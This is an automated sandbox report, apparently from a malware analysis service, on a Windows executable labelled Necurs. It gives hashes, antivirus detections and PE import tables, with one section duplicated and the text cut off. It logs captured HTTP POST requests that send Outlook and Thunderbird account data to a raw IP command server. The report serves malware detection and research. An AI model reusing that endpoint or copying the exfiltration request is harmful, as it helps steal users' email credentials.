paladin316

Exes_69440bc1_exe.json

Jun 17th, 2019
  1.  
  2. [*] MalFamily: "Necurs"
  3.  
  4. [*] MalScore: 10.0
  5.  
  6. [*] File Name: "Exes_69440bc1.exe"
  7. [*] File Size: 401408
  8. [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. [*] SHA256: "7edc56dd709d0af1c2f54cda7d8808c1748fa3370aa9319945dca85943d46710"
  10. [*] MD5: "cfd3bbce7cc2c03f842c8eaa39e830d3"
  11. [*] SHA1: "79b7542eb66a1907802f80db85c879ff6ec423b5"
  12. [*] SHA512: "7da934afea190b3bcaf50e2a75f2d8f2d8565ee5dd708fdb9e0b84927157d32beb6ccad5562ae43adc4c38de9ad7f2ac3ff811b24877ce4b6630625777b5376d"
  13. [*] CRC32: "69440BC1"
  14. [*] SSDEEP: "6144:zBR7zHs5tUeTUSwhJExsyWeTCe1B5TOrdHhjpMCd12I8udh2CF3686/13:tR3szrH5MdB1Vd12YdsCF3686Z"
  15.  
  16. [*] Process Execution: []
  17.  
  18. [*] Signatures Detected: [
  19. {
  20. "Description": "HTTP traffic contains suspicious features which may be indicative of malware-related traffic",
  21. "Details": [
  22. {
  23. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  24. },
  25. {
  26. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  27. },
  28. {
  29. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  30. },
  31. {
  32. "suspicious_request": "http://163.172.84.54/filename.php"
  33. }
  34. ]
  35. },
  36. {
  37. "Description": "Performs some HTTP requests",
  38. "Details": [
  39. {
  40. "url": "http://163.172.84.54/filename.php"
  41. }
  42. ]
  43. },
  44. {
  45. "Description": "Writes a potential ransom message to disk",
  46. "Details": [
  47. {
  48. "ransom_file": "Noriben.py"
  49. },
  50. {
  51. "ransom_file": "readme.txt"
  52. }
  53. ]
  54. },
  55. {
  56. "Description": "File has been identified as malicious by 52 antivirus engines on VirusTotal",
  57. "Details": [
  58. {
  59. "MicroWorld-eScan": "Trojan.GenericKD.31914429"
  60. },
  61. {
  62. "FireEye": "Generic.mg.cfd3bbce7cc2c03f"
  63. },
  64. {
  65. "CAT-QuickHeal": "Trojandropper.Necurs"
  66. },
  67. {
  68. "McAfee": "RDN/Generic.grp"
  69. },
  70. {
  71. "Cylance": "Unsafe"
  72. },
  73. {
  74. "Alibaba": "TrojanDropper:Win32/Necurs.771aab12"
  75. },
  76. {
  77. "K7GW": "Riskware ( 0040eff71 )"
  78. },
  79. {
  80. "K7AntiVirus": "Riskware ( 0040eff71 )"
  81. },
  82. {
  83. "Arcabit": "Trojan.Generic.D1E6F9BD"
  84. },
  85. {
  86. "Invincea": "heuristic"
  87. },
  88. {
  89. "Symantec": "Ransom.Crysis"
  90. },
  91. {
  92. "APEX": "Malicious"
  93. },
  94. {
  95. "Avast": "Win32:Malware-gen"
  96. },
  97. {
  98. "Kaspersky": "Trojan-Dropper.Win32.Necurs.abas"
  99. },
  100. {
  101. "BitDefender": "Trojan.GenericKD.31914429"
  102. },
  103. {
  104. "NANO-Antivirus": "Trojan.Win32.Necurs.fpotwi"
  105. },
  106. {
  107. "Paloalto": "generic.ml"
  108. },
  109. {
  110. "ViRobot": "Trojan.Win32.Agent.401408.AN"
  111. },
  112. {
  113. "Rising": "Dropper.Necurs!8.C43 (CLOUD)"
  114. },
  115. {
  116. "Ad-Aware": "Trojan.GenericKD.31914429"
  117. },
  118. {
  119. "Emsisoft": "Trojan.GenericKD.31914429 (B)"
  120. },
  121. {
  122. "Comodo": "Malware@#uz9bso1tas4q"
  123. },
  124. {
  125. "DrWeb": "Trojan.PWS.Siggen2.12283"
  126. },
  127. {
  128. "TrendMicro": "Trojan.Win32.NECURS.USWE"
  129. },
  130. {
  131. "McAfee-GW-Edition": "BehavesLike.Win32.Generic.fh"
  132. },
  133. {
  134. "Trapmine": "malicious.high.ml.score"
  135. },
  136. {
  137. "Sophos": "Troj/Wonton-AFD"
  138. },
  139. {
  140. "SentinelOne": "DFI - Malicious PE"
  141. },
  142. {
  143. "Cyren": "W32/Trojan.ZDUJ-4279"
  144. },
  145. {
  146. "ESET-NOD32": "a variant of Win32/Kryptik.GSLS"
  147. },
  148. {
  149. "Webroot": "W32.Trojan.GenKD"
  150. },
  151. {
  152. "Antiy-AVL": "Trojan[Dropper]/Win32.Necurs"
  153. },
  154. {
  155. "Microsoft": "Trojan:Win32/Occamy.C"
  156. },
  157. {
  158. "Endgame": "malicious (high confidence)"
  159. },
  160. {
  161. "AegisLab": "Trojan.Win32.Necurs.4!c"
  162. },
  163. {
  164. "ZoneAlarm": "Trojan-Dropper.Win32.Necurs.abas"
  165. },
  166. {
  167. "GData": "Trojan.GenericKD.31914429"
  168. },
  169. {
  170. "TACHYON": "Trojan-Dropper/W32.Necurs.401408"
  171. },
  172. {
  173. "AhnLab-V3": "Trojan/Win32.Agent.C3169420"
  174. },
  175. {
  176. "VBA32": "TrojanDropper.Necurs"
  177. },
  178. {
  179. "ALYac": "Trojan.Agent.Azden"
  180. },
  181. {
  182. "Malwarebytes": "Trojan.Necurs"
  183. },
  184. {
  185. "TrendMicro-HouseCall": "Trojan.Win32.NECURS.USWE"
  186. },
  187. {
  188. "Tencent": "Win32.Trojan-dropper.Necurs.Tdzf"
  189. },
  190. {
  191. "Yandex": "Trojan.DR.Necurs!epG2dZg83x0"
  192. },
  193. {
  194. "Ikarus": "Trojan.Win32.Crypt"
  195. },
  196. {
  197. "Fortinet": "W32/Necurs.ABAS!tr"
  198. },
  199. {
  200. "AVG": "Win32:Malware-gen"
  201. },
  202. {
  203. "Cybereason": "malicious.e7cc2c"
  204. },
  205. {
  206. "Panda": "Trj/GdSda.A"
  207. },
  208. {
  209. "CrowdStrike": "win/malicious_confidence_90% (W)"
  210. },
  211. {
  212. "Qihoo-360": "HEUR/QVM10.2.BA6B.Malware.Gen"
  213. }
  214. ]
  215. }
  216. ]
  217.  
  218. [*] Started Service: []
  219.  
  220. [*] Executed Commands: []
  221.  
  222. [*] Mutexes: []
  223.  
  224. [*] Modified Files: []
  225.  
  226. [*] Deleted Files: []
  227.  
  228. [*] Modified Registry Keys: []
  229.  
  230. [*] Deleted Registry Keys: []
  231.  
  232. [*] DNS Communications: []
  233.  
  234. [*] Domains: []
  235.  
  236. [*] Network Communication - ICMP: []
  237.  
  238. [*] Network Communication - HTTP: [
  239. {
  240. "count": 1,
  241. "body": "{\"outlook-accounts\":null,\"thunderbird-emails\":null}",
  242. "uri": "http://163.172.84.54/filename.php",
  243. "user-agent": "",
  244. "method": "POST",
  245. "host": "163.172.84.54",
  246. "version": "1.1",
  247. "path": "/filename.php",
  248. "data": "POST /filename.php HTTP/1.1\r\nHost: 163.172.84.54\r\nContent-Length: 51\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n{\"outlook-accounts\":null,\"thunderbird-emails\":null}",
  249. "port": 80
  250. },
  251. {
  252. "count": 1,
  253. "body": "{\"outlook-emails\":null}",
  254. "uri": "http://163.172.84.54/filename.php",
  255. "user-agent": "",
  256. "method": "POST",
  257. "host": "163.172.84.54",
  258. "version": "1.1",
  259. "path": "/filename.php",
  260. "data": "POST /filename.php HTTP/1.1\r\nHost: 163.172.84.54\r\nContent-Length: 23\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n{\"outlook-emails\":null}",
  261. "port": 80
  262. }
  263. ]
  264.  
  265. [*] Network Communication - SMTP: []
  266.  
  267. [*] Network Communication - Hosts: []
  268.  
  269. [*] Network Communication - IRC: []
  270.  
  271. [*] Static Analysis: {
  272. "pe": {
  273. "peid_signatures": null,
  274. "imports": [
  275. {
  276. "imports": [
  277. {
  278. "name": "FindClose",
  279. "address": "0x40101c"
  280. },
  281. {
  282. "name": "GetVersionExA",
  283. "address": "0x401020"
  284. },
  285. {
  286. "name": "HeapFree",
  287. "address": "0x401024"
  288. },
  289. {
  290. "name": "FreeLibrary",
  291. "address": "0x401028"
  292. },
  293. {
  294. "name": "GetStdHandle",
  295. "address": "0x40102c"
  296. },
  297. {
  298. "name": "GetVersionExW",
  299. "address": "0x401030"
  300. },
  301. {
  302. "name": "ExitProcess",
  303. "address": "0x401034"
  304. },
  305. {
  306. "name": "CompareStringW",
  307. "address": "0x401038"
  308. },
  309. {
  310. "name": "CompareStringA",
  311. "address": "0x40103c"
  312. },
  313. {
  314. "name": "GetLastError",
  315. "address": "0x401040"
  316. },
  317. {
  318. "name": "GetLocaleInfoW",
  319. "address": "0x401044"
  320. },
  321. {
  322. "name": "VirtualQuery",
  323. "address": "0x401048"
  324. },
  325. {
  326. "name": "GetSystemInfo",
  327. "address": "0x40104c"
  328. },
  329. {
  330. "name": "VirtualProtect",
  331. "address": "0x401050"
  332. },
  333. {
  334. "name": "UnhandledExceptionFilter",
  335. "address": "0x401054"
  336. },
  337. {
  338. "name": "GetCurrentProcess",
  339. "address": "0x401058"
  340. },
  341. {
  342. "name": "TerminateProcess",
  343. "address": "0x40105c"
  344. },
  345. {
  346. "name": "IsValidCodePage",
  347. "address": "0x401060"
  348. },
  349. {
  350. "name": "IsValidLocale",
  351. "address": "0x401064"
  352. },
  353. {
  354. "name": "EnumSystemLocalesA",
  355. "address": "0x401068"
  356. },
  357. {
  358. "name": "LoadLibraryA",
  359. "address": "0x40106c"
  360. },
  361. {
  362. "name": "GetProcAddress",
  363. "address": "0x401070"
  364. },
  365. {
  366. "name": "VirtualAlloc",
  367. "address": "0x401074"
  368. },
  369. {
  370. "name": "GetModuleHandleA",
  371. "address": "0x401078"
  372. },
  373. {
  374. "name": "GetCommandLineA",
  375. "address": "0x40107c"
  376. },
  377. {
  378. "name": "GetTimeZoneInformation",
  379. "address": "0x401080"
  380. },
  381. {
  382. "name": "InterlockedDecrement",
  383. "address": "0x401084"
  384. },
  385. {
  386. "name": "GetStartupInfoW",
  387. "address": "0x401088"
  388. },
  389. {
  390. "name": "SetUnhandledExceptionFilter",
  391. "address": "0x40108c"
  392. },
  393. {
  394. "name": "WriteFile",
  395. "address": "0x401090"
  396. },
  397. {
  398. "name": "GetModuleFileNameA",
  399. "address": "0x401094"
  400. },
  401. {
  402. "name": "GetModuleFileNameW",
  403. "address": "0x401098"
  404. },
  405. {
  406. "name": "FreeEnvironmentStringsA",
  407. "address": "0x40109c"
  408. },
  409. {
  410. "name": "MultiByteToWideChar",
  411. "address": "0x4010a0"
  412. },
  413. {
  414. "name": "GetEnvironmentStrings",
  415. "address": "0x4010a4"
  416. },
  417. {
  418. "name": "FreeEnvironmentStringsW",
  419. "address": "0x4010a8"
  420. },
  421. {
  422. "name": "GetEnvironmentStringsW",
  423. "address": "0x4010ac"
  424. },
  425. {
  426. "name": "GetCommandLineW",
  427. "address": "0x4010b0"
  428. },
  429. {
  430. "name": "SetHandleCount",
  431. "address": "0x4010b4"
  432. },
  433. {
  434. "name": "GetFileType",
  435. "address": "0x4010b8"
  436. },
  437. {
  438. "name": "GetStartupInfoA",
  439. "address": "0x4010bc"
  440. },
  441. {
  442. "name": "DeleteCriticalSection",
  443. "address": "0x4010c0"
  444. },
  445. {
  446. "name": "GetModuleHandleW",
  447. "address": "0x4010c4"
  448. },
  449. {
  450. "name": "TlsGetValue",
  451. "address": "0x4010c8"
  452. },
  453. {
  454. "name": "TlsAlloc",
  455. "address": "0x4010cc"
  456. },
  457. {
  458. "name": "TlsSetValue",
  459. "address": "0x4010d0"
  460. },
  461. {
  462. "name": "TlsFree",
  463. "address": "0x4010d4"
  464. },
  465. {
  466. "name": "InterlockedIncrement",
  467. "address": "0x4010d8"
  468. },
  469. {
  470. "name": "SetLastError",
  471. "address": "0x4010dc"
  472. },
  473. {
  474. "name": "GetCurrentThreadId",
  475. "address": "0x4010e0"
  476. },
  477. {
  478. "name": "GetCurrentThread",
  479. "address": "0x4010e4"
  480. },
  481. {
  482. "name": "HeapDestroy",
  483. "address": "0x4010e8"
  484. },
  485. {
  486. "name": "HeapCreate",
  487. "address": "0x4010ec"
  488. },
  489. {
  490. "name": "VirtualFree",
  491. "address": "0x4010f0"
  492. },
  493. {
  494. "name": "QueryPerformanceCounter",
  495. "address": "0x4010f4"
  496. },
  497. {
  498. "name": "GetTickCount",
  499. "address": "0x4010f8"
  500. },
  501. {
  502. "name": "GetCurrentProcessId",
  503. "address": "0x4010fc"
  504. },
  505. {
  506. "name": "GetSystemTimeAsFileTime",
  507. "address": "0x401100"
  508. },
  509. {
  510. "name": "GetCPInfo",
  511. "address": "0x401104"
  512. },
  513. {
  514. "name": "GetACP",
  515. "address": "0x401108"
  516. },
  517. {
  518. "name": "GetOEMCP",
  519. "address": "0x40110c"
  520. },
  521. {
  522. "name": "OutputDebugStringA",
  523. "address": "0x401110"
  524. },
  525. {
  526. "name": "LeaveCriticalSection",
  527. "address": "0x401114"
  528. },
  529. {
  530. "name": "FatalAppExitA",
  531. "address": "0x401118"
  532. },
  533. {
  534. "name": "EnterCriticalSection",
  535. "address": "0x40111c"
  536. },
  537. {
  538. "name": "SetConsoleCtrlHandler",
  539. "address": "0x401120"
  540. },
  541. {
  542. "name": "InterlockedExchange",
  543. "address": "0x401124"
  544. },
  545. {
  546. "name": "LoadLibraryExA",
  547. "address": "0x401128"
  548. },
  549. {
  550. "name": "InitializeCriticalSection",
  551. "address": "0x40112c"
  552. },
  553. {
  554. "name": "HeapAlloc",
  555. "address": "0x401130"
  556. },
  557. {
  558. "name": "Sleep",
  559. "address": "0x401134"
  560. },
  561. {
  562. "name": "HeapReAlloc",
  563. "address": "0x401138"
  564. },
  565. {
  566. "name": "RtlUnwind",
  567. "address": "0x40113c"
  568. },
  569. {
  570. "name": "LCMapStringA",
  571. "address": "0x401140"
  572. },
  573. {
  574. "name": "WideCharToMultiByte",
  575. "address": "0x401144"
  576. },
  577. {
  578. "name": "LCMapStringW",
  579. "address": "0x401148"
  580. },
  581. {
  582. "name": "GetStringTypeA",
  583. "address": "0x40114c"
  584. },
  585. {
  586. "name": "GetStringTypeW",
  587. "address": "0x401150"
  588. },
  589. {
  590. "name": "GetTimeFormatA",
  591. "address": "0x401154"
  592. },
  593. {
  594. "name": "GetDateFormatA",
  595. "address": "0x401158"
  596. },
  597. {
  598. "name": "GetUserDefaultLCID",
  599. "address": "0x40115c"
  600. },
  601. {
  602. "name": "GetLocaleInfoA",
  603. "address": "0x401160"
  604. },
  605. {
  606. "name": "SetEnvironmentVariableA",
  607. "address": "0x401164"
  608. }
  609. ],
  610. "dll": "KERNEL32.dll"
  611. },
  612. {
  613. "imports": [
  614. {
  615. "name": "SetWindowLongW",
  616. "address": "0x40116c"
  617. },
  618. {
  619. "name": "CreateWindowExW",
  620. "address": "0x401170"
  621. },
  622. {
  623. "name": "SetWindowTextW",
  624. "address": "0x401174"
  625. },
  626. {
  627. "name": "CreateWindowExA",
  628. "address": "0x401178"
  629. },
  630. {
  631. "name": "PostMessageW",
  632. "address": "0x40117c"
  633. },
  634. {
  635. "name": "UnregisterClassA",
  636. "address": "0x401180"
  637. },
  638. {
  639. "name": "DestroyWindow",
  640. "address": "0x401184"
  641. },
  642. {
  643. "name": "LoadStringW",
  644. "address": "0x401188"
  645. },
  646. {
  647. "name": "GetMenuStringW",
  648. "address": "0x40118c"
  649. },
  650. {
  651. "name": "DefWindowProcW",
  652. "address": "0x401190"
  653. },
  654. {
  655. "name": "SendMessageW",
  656. "address": "0x401194"
  657. },
  658. {
  659. "name": "RegisterClassW",
  660. "address": "0x401198"
  661. }
  662. ],
  663. "dll": "USER32.dll"
  664. },
  665. {
  666. "imports": [
  667. {
  668. "name": "RegOpenKeyExA",
  669. "address": "0x401000"
  670. },
  671. {
  672. "name": "RegEnumValueA",
  673. "address": "0x401004"
  674. },
  675. {
  676. "name": "RegSetValueExA",
  677. "address": "0x401008"
  678. },
  679. {
  680. "name": "RegOpenKeyExW",
  681. "address": "0x40100c"
  682. }
  683. ],
  684. "dll": "ADVAPI32.dll"
  685. },
  686. {
  687. "imports": [
  688. {
  689. "name": "ImageList_Add",
  690. "address": "0x401014"
  691. }
  692. ],
  693. "dll": "COMCTL32.dll"
  694. }
  695. ],
  696. "digital_signers": null,
  697. "exported_dll_name": null,
  698. "actual_checksum": "0x0006d473",
  699. "overlay": null,
  700. "imagebase": "0x00400000",
  701. "reported_checksum": "0x00000000",
  702. "icon_hash": null,
  703. "entrypoint": "0x00446f6d",
  704. "timestamp": "2017-06-26 19:27:00",
  705. "osversion": "4.0",
  706. "sections": [
  707. {
  708. "name": ".text",
  709. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
  710. "virtual_address": "0x00001000",
  711. "size_of_data": "0x0005b000",
  712. "entropy": "6.41",
  713. "raw_address": "0x00001000",
  714. "virtual_size": "0x0005a538",
  715. "characteristics_raw": "0x70000020"
  716. },
  717. {
  718. "name": ".data",
  719. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  720. "virtual_address": "0x0005c000",
  721. "size_of_data": "0x00003000",
  722. "entropy": "4.54",
  723. "raw_address": "0x0005c000",
  724. "virtual_size": "0x00002d80",
  725. "characteristics_raw": "0xd0000040"
  726. },
  727. {
  728. "name": ".sxdata",
  729. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_LNK_INFO|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  730. "virtual_address": "0x0005f000",
  731. "size_of_data": "0x00001000",
  732. "entropy": "0.07",
  733. "raw_address": "0x0005f000",
  734. "virtual_size": "0x0000006c",
  735. "characteristics_raw": "0xc0000240"
  736. },
  737. {
  738. "name": ".reloc",
  739. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
  740. "virtual_address": "0x00060000",
  741. "size_of_data": "0x00002000",
  742. "entropy": "3.98",
  743. "raw_address": "0x00060000",
  744. "virtual_size": "0x000011aa",
  745. "characteristics_raw": "0x42000040"
  746. }
  747. ],
  748. "resources": [],
  749. "dirents": [
  750. {
  751. "virtual_address": "0x00000000",
  752. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  753. "size": "0x00000000"
  754. },
  755. {
  756. "virtual_address": "0x0005abdc",
  757. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  758. "size": "0x00000064"
  759. },
  760. {
  761. "virtual_address": "0x00000000",
  762. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  763. "size": "0x00000000"
  764. },
  765. {
  766. "virtual_address": "0x00000000",
  767. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  768. "size": "0x00000000"
  769. },
  770. {
  771. "virtual_address": "0x00000000",
  772. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  773. "size": "0x00000000"
  774. },
  775. {
  776. "virtual_address": "0x00060000",
  777. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  778. "size": "0x00000eec"
  779. },
  780. {
  781. "virtual_address": "0x00000000",
  782. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  783. "size": "0x00000000"
  784. },
  785. {
  786. "virtual_address": "0x00000000",
  787. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  788. "size": "0x00000000"
  789. },
  790. {
  791. "virtual_address": "0x00000000",
  792. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  793. "size": "0x00000000"
  794. },
  795. {
  796. "virtual_address": "0x00000000",
  797. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  798. "size": "0x00000000"
  799. },
  800. {
  801. "virtual_address": "0x00000000",
  802. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  803. "size": "0x00000000"
  804. },
  805. {
  806. "virtual_address": "0x00000000",
  807. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  808. "size": "0x00000000"
  809. },
  810. {
  811. "virtual_address": "0x00001000",
  812. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  813. "size": "0x000001a0"
  814. },
  815. {
  816. "virtual_address": "0x00000000",
  817. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  818. "size": "0x00000000"
  819. },
  820. {
  821. "virtual_address": "0x00000000",
  822. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  823. "size": "0x00000000"
  824. },
  825. {
  826. "virtual_address": "0x00000000",
  827. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  828. "size": "0x00000000"
  829. }
  830. ],
  831. "exports": [],
  832. "guest_signers": {},
  833. "imphash": "7073758031d4012622cea53183697aac",
  834. "icon_fuzzy": null,
  835. "icon": null,
  836. "pdbpath": null,
  837. "imported_dll_count": 4,
  838. "versioninfo": []
  839. }
  840. }
  841.  
  842. [*] Resolved APIs: []
  843.  
  844. [*] Static Analysis: {
  845. "pe": {
  846. "peid_signatures": null,
  847. "imports": [
  848. {
  849. "imports": [
  850. {
  851. "name": "FindClose",
  852. "address": "0x40101c"
  853. },
  854. {
  855. "name": "GetVersionExA",
  856. "address": "0x401020"
  857. },
  858. {
  859. "name": "HeapFree",
  860. "address": "0x401024"
  861. },
  862. {
  863. "name": "FreeLibrary",
  864. "address": "0x401028"
  865. },
  866. {
  867. "name": "GetStdHandle",
  868. "address": "0x40102c"
  869. },
  870. {
  871. "name": "GetVersionExW",
  872. "address": "0x401030"
  873. },
  874. {
  875. "name": "ExitProcess",
  876. "address": "0x401034"
  877. },
  878. {
  879. "name": "CompareStringW",
  880. "address": "0x401038"
  881. },
  882. {
  883. "name": "CompareStringA",
  884. "address": "0x40103c"
  885. },
  886. {
  887. "name": "GetLastError",
  888. "address": "0x401040"
  889. },
  890. {
  891. "name": "GetLocaleInfoW",
  892. "address": "0x401044"
  893. },
  894. {
  895. "name": "VirtualQuery",
  896. "address": "0x401048"
  897. },
  898. {
  899. "name": "GetSystemInfo",
  900. "address": "0x40104c"
  901. },
  902. {
  903. "name": "VirtualProtect",
  904. "address": "0x401050"
  905. },
  906. {
  907. "name": "UnhandledExceptionFilter",
  908. "address": "0x401054"
  909. },
  910. {
  911. "name": "GetCurrentProcess",
  912. "address": "0x401058"
  913. },
  914. {
  915. "name": "TerminateProcess",
  916. "address": "0x40105c"
  917. },
  918. {
  919. "name": "IsValidCodePage",
  920. "address": "0x401060"
  921. },
  922. {
  923. "name": "IsValidLocale",
  924. "address": "0x401064"
  925. },
  926. {
  927. "name": "EnumSystemLocalesA",
  928. "address": "0x401068"
  929. },
  930. {
  931. "name": "LoadLibraryA",
  932. "address": "0x40106c"
  933. },
  934. {
  935. "name": "GetProcAddress",
  936. "address": "0x401070"
  937. },
  938. {
  939. "name": "VirtualAlloc",
  940. "address": "0x401074"
  941. },
  942. {
  943. "name": "GetModuleHandleA",
  944. "address": "0x401078"
  945. },
  946. {
  947. "name": "GetCommandLineA",
  948. "address": "0x40107c"
  949. },
  950. {
  951. "name": "GetTimeZoneInformation",
  952. "address": "0x401080"
  953. },
  954. {
  955. "name": "InterlockedDecrement",
  956. "address": "0x401084"
  957. },
  958. {
  959. "name": "GetStartupInfoW",
  960. "address": "0x401088"
  961. },
  962. {
  963. "name": "SetUnhandledExceptionFilter",
  964. "address": "0x40108c"
  965. },
  966. {
  967. "name": "WriteFile",
  968. "address": "0x401090"
  969. },
  970. {
  971. "name": "GetModuleFileNameA",
  972. "address": "0x401094"
  973. },
  974. {
  975. "name": "GetModuleFileNameW",
  976. "address": "0x401098"
  977. },
  978. {
  979. "name": "FreeEnvironmentStringsA",
  980. "address": "0x40109c"
  981. },
  982. {
  983. "name": "MultiByteToWideChar",
  984. "address": "0x4010a0"
  985. },
  986. {
  987. "name": "GetEnvironmentStrings",
  988. "address": "0x4010a4"
  989. },
  990. {
  991. "name": "FreeEnvironmentStringsW",
  992. "address": "0x4010a8"
  993. },
  994. {
  995. "name": "GetEnvironmentStringsW",
  996. "address": "0x4010ac"
  997. },
  998. {
  999. "name": "GetCommandLineW",
  1000. "address": "0x4010b0"
  1001. },
  1002. {
  1003. "name": "SetHandleCount",
  1004. "address": "0x4010b4"
  1005. },
  1006. {
  1007. "name": "GetFileType",
  1008. "address": "0x4010b8"
  1009. },
  1010. {
  1011. "name": "GetStartupInfoA",
  1012. "address": "0x4010bc"
  1013. },
  1014. {
  1015. "name": "DeleteCriticalSection",
  1016. "address": "0x4010c0"
  1017. },
  1018. {
  1019. "name": "GetModuleHandleW",
  1020. "address": "0x4010c4"
  1021. },
  1022. {
  1023. "name": "TlsGetValue",
  1024. "address": "0x4010c8"
  1025. },
  1026. {
  1027. "name": "TlsAlloc",
  1028. "address": "0x4010cc"
  1029. },
  1030. {
  1031. "name": "TlsSetValue",
  1032. "address": "0x4010d0"
  1033. },
  1034. {
  1035. "name": "TlsFree",
  1036. "address": "0x4010d4"
  1037. },
  1038. {
  1039. "name": "InterlockedIncrement",
  1040. "address": "0x4010d8"
  1041. },
  1042. {
  1043. "name": "SetLastError",
  1044. "address": "0x4010dc"
  1045. },
  1046. {
  1047. "name": "GetCurrentThreadId",
  1048. "address": "0x4010e0"
  1049. },
  1050. {
  1051. "name": "GetCurrentThread",
  1052. "address": "0x4010e4"
  1053. },
  1054. {
  1055. "name": "HeapDestroy",
  1056. "address": "0x4010e8"
  1057. },
  1058. {
  1059. "name": "HeapCreate",
  1060. "address": "0x4010ec"
  1061. },
  1062. {
  1063. "name": "VirtualFree",
  1064. "address": "0x4010f0"
  1065. },
  1066. {
  1067. "name": "QueryPerformanceCounter",
  1068. "address": "0x4010f4"
  1069. },
  1070. {
  1071. "name": "GetTickCount",
  1072. "address": "0x4010f8"
  1073. },
  1074. {
  1075. "name": "GetCurrentProcessId",
  1076. "address": "0x4010fc"
  1077. },
  1078. {
  1079. "name": "GetSystemTimeAsFileTime",
  1080. "address": "0x401100"
  1081. },
  1082. {
  1083. "name": "GetCPInfo",
  1084. "address": "0x401104"
  1085. },
  1086. {
  1087. "name": "GetACP",
  1088. "address": "0x401108"
  1089. },
  1090. {
  1091. "name": "GetOEMCP",
  1092. "address": "0x40110c"
  1093. },
  1094. {
  1095. "name": "OutputDebugStringA",
  1096. "address": "0x401110"
  1097. },
  1098. {
  1099. "name": "LeaveCriticalSection",
  1100. "address": "0x401114"
  1101. },
  1102. {
  1103. "name": "FatalAppExitA",
  1104. "address": "0x401118"
  1105. },
  1106. {
  1107. "name": "EnterCriticalSection",
  1108. "address": "0x40111c"
  1109. },
  1110. {
  1111. "name": "SetConsoleCtrlHandler",
  1112. "address": "0x401120"
  1113. },
  1114. {
  1115. "name": "InterlockedExchange",
  1116. "address": "0x401124"
  1117. },
  1118. {
  1119. "name": "LoadLibraryExA",
  1120. "address": "0x401128"
  1121. },
  1122. {
  1123. "name": "InitializeCriticalSection",
  1124. "address": "0x40112c"
  1125. },
  1126. {
  1127. "name": "HeapAlloc",
  1128. "address": "0x401130"
  1129. },
  1130. {
  1131. "name": "Sleep",
  1132. "address": "0x401134"
  1133. },
  1134. {
  1135. "name": "HeapReAlloc",
  1136. "address": "0x401138"
  1137. },
  1138. {
  1139. "name": "RtlUnwind",
  1140. "address": "0x40113c"
  1141. },
  1142. {
  1143. "name": "LCMapStringA",
  1144. "address": "0x401140"
  1145. },
  1146. {
  1147. "name": "WideCharToMultiByte",
  1148. "address": "0x401144"
  1149. },
  1150. {
  1151. "name": "LCMapStringW",
  1152. "address": "0x401148"
  1153. },
  1154. {
  1155. "name": "GetStringTypeA",
  1156. "address": "0x40114c"
  1157. },
  1158. {
  1159. "name": "GetStringTypeW",
  1160. "address": "0x401150"
  1161. },
  1162. {
  1163. "name": "GetTimeFormatA",
  1164. "address": "0x401154"
  1165. },
  1166. {
  1167. "name": "GetDateFormatA",
  1168. "address": "0x401158"
  1169. },
  1170. {
  1171. "name": "GetUserDefaultLCID",
  1172. "address": "0x40115c"
  1173. },
  1174. {
  1175. "name": "GetLocaleInfoA",
  1176. "address": "0x401160"
  1177. },
  1178. {
  1179. "name": "SetEnvironmentVariableA",
  1180. "address": "0x401164"
  1181. }
  1182. ],
  1183. "dll": "KERNEL32.dll"
  1184. },
  1185. {
  1186. "imports": [
  1187. {
  1188. "name": "SetWindowLongW",
  1189. "address": "0x40116c"
  1190. },
  1191. {
  1192. "name": "CreateWindowExW",
  1193. "address": "0x401170"
  1194. },
  1195. {
  1196. "name": "SetWindowTextW",
  1197. "address": "0x401174"
  1198. },
  1199. {
  1200. "name": "CreateWindowExA",
  1201. "address": "0x401178"
  1202. },
  1203. {
  1204. "name": "PostMessageW",
  1205. "address": "0x40117c"
  1206. },
  1207. {
  1208. "name": "UnregisterClassA",
  1209. "address": "0x401180"
  1210. },
  1211. {
  1212. "name": "DestroyWindow",
  1213. "address": "0x401184"
  1214. },
  1215. {
  1216. "name": "LoadStringW",
  1217. "address": "0x401188"
  1218. },
  1219. {
  1220. "name": "GetMenuStringW",
  1221. "address": "0x40118c"
  1222. },
  1223. {
  1224. "name": "DefWindowProcW",
  1225. "address": "0x401190"
  1226. },
  1227. {
  1228. "name": "SendMessageW",
  1229. "address": "0x401194"
  1230. },
  1231. {
  1232. "name": "RegisterClassW",
  1233. "address": "0x401198"
  1234. }
  1235. ],
  1236. "dll": "USER32.dll"
  1237. },
  1238. {
  1239. "imports": [
  1240. {
  1241. "name": "RegOpenKeyExA",
  1242. "address": "0x401000"
  1243. },
  1244. {
  1245. "name": "RegEnumValueA",
  1246. "address": "0x401004"
  1247. },
  1248. {
  1249. "name": "RegSetValueExA",
